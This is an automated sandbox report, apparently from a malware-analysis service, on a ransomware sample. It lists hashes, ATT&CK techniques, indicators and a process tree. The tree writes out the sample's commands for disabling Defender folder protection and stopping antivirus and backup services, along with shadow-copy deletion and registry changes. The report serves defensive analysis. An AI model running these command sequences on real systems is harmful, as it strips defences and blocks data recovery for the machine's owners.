1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
50s
max time network
61s
platform
windows10_x64
resource
win10v20210408
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
Size

91KB
MD5

1d3ed93e99f01fa636b02faab5690de5
SHA1

b818f4c33e346c2ce23e62e95d4c0eaa7f0a3128
SHA256

121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717
SHA512

0628321e5a61bfd6d62c46d1171d9ab5153f5ec8dbda7f924c1a0cc857a12183863b105b6a0a10a107167e188bc830cf032490261a1d80d695740fb3f8dbe308

Score

9^/10

ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 4 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\Pictures\AssertLimit.png.locked	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\ResumeWait.tiff	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
File created	C:\Users\Admin\Pictures\ResumeWait.tiff.locked	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
File created	C:\Users\Admin\Pictures\SuspendCompare.raw.locked	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe

Drops startup file 1 IoCs

Processes:

121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
5228	vssadmin.exe
5208	vssadmin.exe
5196	vssadmin.exe
5188	vssadmin.exe
5172	vssadmin.exe
5144	vssadmin.exe
5244	vssadmin.exe
5156	vssadmin.exe
5132	vssadmin.exe
5236	vssadmin.exe
5180	vssadmin.exe
5164	vssadmin.exe
2856	vssadmin.exe
5220	vssadmin.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

5108 taskkill.exe
5020 taskkill.exe
4572 taskkill.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

2188 notepad.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4484 PING.EXE

pid	process
5108	taskkill.exe
5020	taskkill.exe
4572	taskkill.exe

pid	process
2188	notepad.exe

pid	process
4484	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe

pid	process
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exepowershell.exetaskkill.exetaskkill.exetaskkill.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
Token: SeDebugPrivilege	2656	powershell.exe
Token: SeDebugPrivilege	5108	taskkill.exe
Token: SeDebugPrivilege	4572	taskkill.exe
Token: SeDebugPrivilege	5020	taskkill.exe
Token: SeBackupPrivilege	4912	vssvc.exe
Token: SeRestorePrivilege	4912	vssvc.exe
Token: SeAuditPrivilege	4912	vssvc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe

pid process

908 121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe

pid process

908 121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 908 wrote to memory of 2656	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	powershell.exe
PID 908 wrote to memory of 2656	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	powershell.exe
PID 908 wrote to memory of 2656	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	powershell.exe
PID 908 wrote to memory of 3000	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 3000	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 3000	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 1664	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 1664	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 1664	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 1244	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 1244	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 1244	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 208	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 208	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 208	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 2180	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 2180	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 2180	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 3156	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 3156	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 3156	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 2804	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 2804	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 2804	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 2280	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 2280	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 2280	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 1328	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 1328	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 1328	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 3000 wrote to memory of 3012	3000	net.exe	net1.exe
PID 3000 wrote to memory of 3012	3000	net.exe	net1.exe
PID 3000 wrote to memory of 3012	3000	net.exe	net1.exe
PID 908 wrote to memory of 3404	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 3404	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 3404	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 3628	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 3628	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 3628	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 1664 wrote to memory of 996	1664	net.exe	net1.exe
PID 1664 wrote to memory of 996	1664	net.exe	net1.exe
PID 1664 wrote to memory of 996	1664	net.exe	net1.exe
PID 908 wrote to memory of 2848	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 2848	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 2848	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 1244 wrote to memory of 3844	1244	net.exe	net1.exe
PID 1244 wrote to memory of 3844	1244	net.exe	net1.exe
PID 1244 wrote to memory of 3844	1244	net.exe	net1.exe
PID 908 wrote to memory of 3336	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 3336	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 3336	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 2180 wrote to memory of 3604	2180	net.exe	net1.exe
PID 2180 wrote to memory of 3604	2180	net.exe	net1.exe
PID 2180 wrote to memory of 3604	2180	net.exe	net1.exe
PID 208 wrote to memory of 3688	208	net.exe	net1.exe
PID 208 wrote to memory of 3688	208	net.exe	net1.exe
PID 208 wrote to memory of 3688	208	net.exe	net1.exe
PID 908 wrote to memory of 3900	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 3900	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 908 wrote to memory of 3900	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe
PID 3156 wrote to memory of 184	3156	net.exe	net1.exe
PID 3156 wrote to memory of 184	3156	net.exe	net1.exe
PID 3156 wrote to memory of 184	3156	net.exe	net1.exe
PID 908 wrote to memory of 2284	908	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe	net.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe

C:\Users\Admin\AppData\Local\Temp\121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:908
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2656
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop avpsus /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3000
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:3012
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1664
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:996
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:208
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:3688
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mfewc /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1244
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:3844
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2180
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:3604
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3156
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:184
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:2280
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:2004
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:3404
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:4212
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:1328
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:4116
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:2804
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:856
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:3628
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:4292
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:2848
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:4424
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:3336
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:4452
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:3900
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:4500
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:2284
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:4548
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:212
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:4728
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:3316
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:4660
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:4140
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:4716
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:4192
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:4856
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:4344
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:4944
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:4248
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:4872
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:4396
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:5012
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:4444
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:5100
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:4540
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:4440
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:4488
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:3500
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:4608
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:4784
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:4648
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:2836
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:4696
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:3596
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:4772
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:4704
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:4832
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:5416
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:4904
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:5840
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:4972
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:5920
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:5032
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:5808
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:5072
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:5932
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:4692
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:5940
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:4200
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:5904
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:5064
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:4152
- C:\Windows\SysWOW64\sc.exe
